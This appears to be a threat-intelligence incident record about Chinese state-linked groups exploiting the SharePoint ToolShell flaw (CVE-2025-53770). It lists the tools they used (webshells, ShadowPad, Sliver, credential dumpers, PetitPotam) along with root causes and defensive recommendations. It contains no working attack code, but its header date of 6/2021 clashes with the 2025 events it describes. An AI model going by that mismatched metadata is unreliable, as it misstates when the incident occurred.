A telecommunications service provider in the Middle East fell victim to a sophisticated cyber attack exploiting the ToolShell vulnerability (CVE-2025-53770) in Microsoft SharePoint. The attack, attributed to Chinese state-sponsored threat actors (including Salt Typhoon), began on July 21 with the deployment of webshells for persistent access. The attackers then used DLL side-loading to install the Zingdoor backdoor (Go-based), followed by the ShadowPad Trojan, KrustyLoader, and the Sliver post-exploitation framework.Credential theft was conducted via ProcDump, Minidump, and LsassDumper, while PetitPotam (CVE-2021-36942) was exploited for domain compromise. The attack leveraged living-off-the-land tools (e.g., Certutil, GoGo Scanner, Revsocks) for data exfiltration, lateral movement, and persistence. The breach likely resulted in unauthorized access to sensitive corporate and customer data, operational disruption, and potential espionage risks given the target’s role in regional communications infrastructure. The use of legitimate security vendor executables (Trend Micro, BitDefender) to evade detection highlights the attack’s advanced evasion techniques.
TPRM report: https://www.rankiteo.com/company/du
"id": "du3432434102225",
"linkid": "du",
"type": "Cyber Attack",
"date": "6/2021",
"severity": "100",
"impact": "6",
"explanation": "Attack threatening the economy of geographical region"{'affected_entities': [{'industry': 'Telecommunications',
'location': 'Middle East',
'name': 'Unnamed Telecommunications Service Provider',
'type': 'Private Sector'},
{'industry': 'Public Administration',
'location': 'Africa',
'name': 'Two Unnamed Government Departments',
'type': 'Government'},
{'industry': 'Public Administration',
'location': 'South America',
'name': 'Two Unnamed Government Agencies',
'type': 'Government'},
{'industry': 'Education',
'location': 'United States',
'name': 'Unnamed University',
'type': 'Educational Institution'},
{'industry': 'Technology/IT',
'location': 'Africa',
'name': 'Unnamed State Technology Agency',
'type': 'Government'},
{'industry': 'Public Administration',
'location': 'Middle East',
'name': 'Unnamed Government Department',
'type': 'Government'},
{'industry': 'Financial Services',
'location': 'Europe',
'name': 'Unnamed Finance Company',
'type': 'Private Sector'}],
'attack_vector': ['Exploitation of Public-Facing Application (CVE-2025-53770)',
'Webshell Deployment',
'DLL Side-Loading',
'Living-off-the-Land Tools'],
'customer_advisories': ['Patch Immediately',
'Monitor for Indicators of Compromise (IoCs)'],
'data_breach': {'data_exfiltration': ['Likely (via Revsocks Utility)'],
'personally_identifiable_information': ['Potential (via '
'Credential Theft)'],
'sensitivity_of_data': ['High (Government/Telecom/Finance '
'Sectors)'],
'type_of_data_compromised': ['System Information',
'Credentials (via Lsass Dumping)',
'Potential Sensitive Files']},
'date_detected': '2025-07-20',
'date_publicly_disclosed': '2025-07-20',
'description': 'Hackers believed to be associated with China exploited the '
'ToolShell vulnerability (CVE-2025-53770) in Microsoft '
'SharePoint, targeting government agencies, universities, '
'telecommunication providers, and finance organizations. The '
'flaw, a bypass for CVE-2025-49706 and CVE-2025-49704, allows '
'remote code execution and full file system access without '
'authentication. Microsoft released emergency updates on July '
'21 after the zero-day was disclosed on July 20. The attacks '
'involved multiple Chinese threat groups (Budworm/Linen '
'Typhoon, Sheathminer/Violet Typhoon, Storm-2603/Warlock, and '
'Salt Typhoon), deploying webshells, backdoors (Zingdoor, '
'ShadowPad), and post-exploitation tools (KrustyLoader, '
'Sliver). Credential dumping and domain compromise (via '
'PetitPotam) were also observed, alongside living-off-the-land '
'tools like Certutil, GoGo Scanner, and Revsocks.',
'impact': {'brand_reputation_impact': ['Potential Reputation Damage for '
'Affected Organizations',
'Trust Erosion in Government/Telecom '
'Sectors'],
'data_compromised': True,
'identity_theft_risk': ['High (Credential Dumping via ProcDump, '
'Minidump, LsassDumper)'],
'operational_impact': ['Persistent Access via Webshells',
'Credential Theft',
'Lateral Movement',
'Post-Exploitation (Sliver Framework)'],
'systems_affected': ['Microsoft SharePoint Servers (On-Premise)',
'Domain Controllers (via PetitPotam)',
'Compromised Endpoints']},
'initial_access_broker': {'backdoors_established': ['Zingdoor (Go-based)',
'ShadowPad Trojan',
'KrustyLoader '
'(Rust-based)'],
'entry_point': 'CVE-2025-53770 (ToolShell) in '
'Microsoft SharePoint',
'high_value_targets': ['Government Agencies',
'Telecom Providers',
'Financial Institutions',
'Universities']},
'investigation_status': 'Ongoing (Symantec and Microsoft)',
'lessons_learned': ['Zero-day vulnerabilities in widely used software (e.g., '
'SharePoint) are prime targets for state-sponsored '
'actors.',
'Living-off-the-land tools (e.g., Certutil) and '
'legitimate executables (Trend Micro, BitDefender) can '
'bypass traditional defenses.',
'Credential dumping remains a critical post-exploitation '
'step for lateral movement.',
'Patch management urgency is critical for zero-days with '
'public exploitation.'],
'motivation': ['Espionage', 'Data Theft', 'Persistent Access'],
'post_incident_analysis': {'corrective_actions': ['Accelerate patch '
'deployment timelines for '
'critical vulnerabilities.',
'Deploy behavioral-based '
'detection for '
'post-exploitation tools '
'(e.g., Sliver).',
'Implement stricter '
'controls on '
'living-off-the-land tool '
'usage.',
'Enhance threat '
'intelligence sharing for '
'Chinese APT groups.'],
'root_causes': ['Unpatched zero-day vulnerability '
'(CVE-2025-53770) in on-premise '
'SharePoint servers.',
'Insufficient detection for '
'webshell deployment and DLL '
'side-loading.',
'Over-reliance on perimeter '
'defenses without behavioral '
'monitoring for '
'post-exploitation.']},
'ransomware': {'data_exfiltration': ['Possible (via KrustyLoader/Sliver)'],
'ransomware_strain': ['Warlock (associated with Storm-2603)']},
'recommendations': ['Immediate patching of CVE-2025-53770 and related flaws '
'(CVE-2025-49706, CVE-2025-49704).',
'Monitor for webshell activity and unusual DLL '
'side-loading patterns.',
'Restrict use of living-off-the-land tools (e.g., '
'Certutil) via application whitelisting.',
'Enhance detection for post-exploitation frameworks '
'(e.g., Sliver).',
'Conduct thorough credential audits and rotations '
'post-breach.',
'Segment networks to limit lateral movement from '
'SharePoint servers.'],
'references': [{'source': 'Symantec (Broadcom) Report'},
{'source': 'Microsoft Security Advisory (CVE-2025-53770)'},
{'source': 'Viettel Cyber Security (Pwn2Own Berlin '
'Demonstration)'}],
'regulatory_compliance': {'regulatory_notifications': ['Potential '
'Notifications to '
'Sector-Specific '
'Regulators (e.g., '
'Telecom, Finance)']},
'response': {'communication_strategy': ['Symantec Public Report',
'Microsoft Security Advisory'],
'containment_measures': ['Microsoft Emergency Patches (July 21)',
'Webshell Detection/Removal'],
'enhanced_monitoring': ['Detection of DLL Side-Loading',
'Sliver Framework Activity'],
'incident_response_plan_activated': True,
'remediation_measures': ['Patch Management for CVE-2025-53770',
'Credential Rotation',
'Backdoor Removal (Zingdoor, '
'ShadowPad)'],
'third_party_assistance': ['Symantec (Broadcom)', 'Microsoft']},
'stakeholder_advisories': ['Microsoft Security Updates',
'Symantec Threat Intelligence Report'],
'threat_actor': ['Budworm (Linen Typhoon)',
'Sheathminer (Violet Typhoon)',
'Storm-2603 (Warlock Ransomware)',
'Salt Typhoon'],
'title': 'Exploitation of ToolShell Vulnerability (CVE-2025-53770) in '
'Microsoft SharePoint by Chinese Threat Actors',
'type': ['Cyber Espionage',
'Unauthorized Access',
'Data Exfiltration',
'Credential Theft'],
'vulnerability_exploited': ['CVE-2025-53770 (ToolShell)',
'CVE-2021-36942 (PetitPotam)']}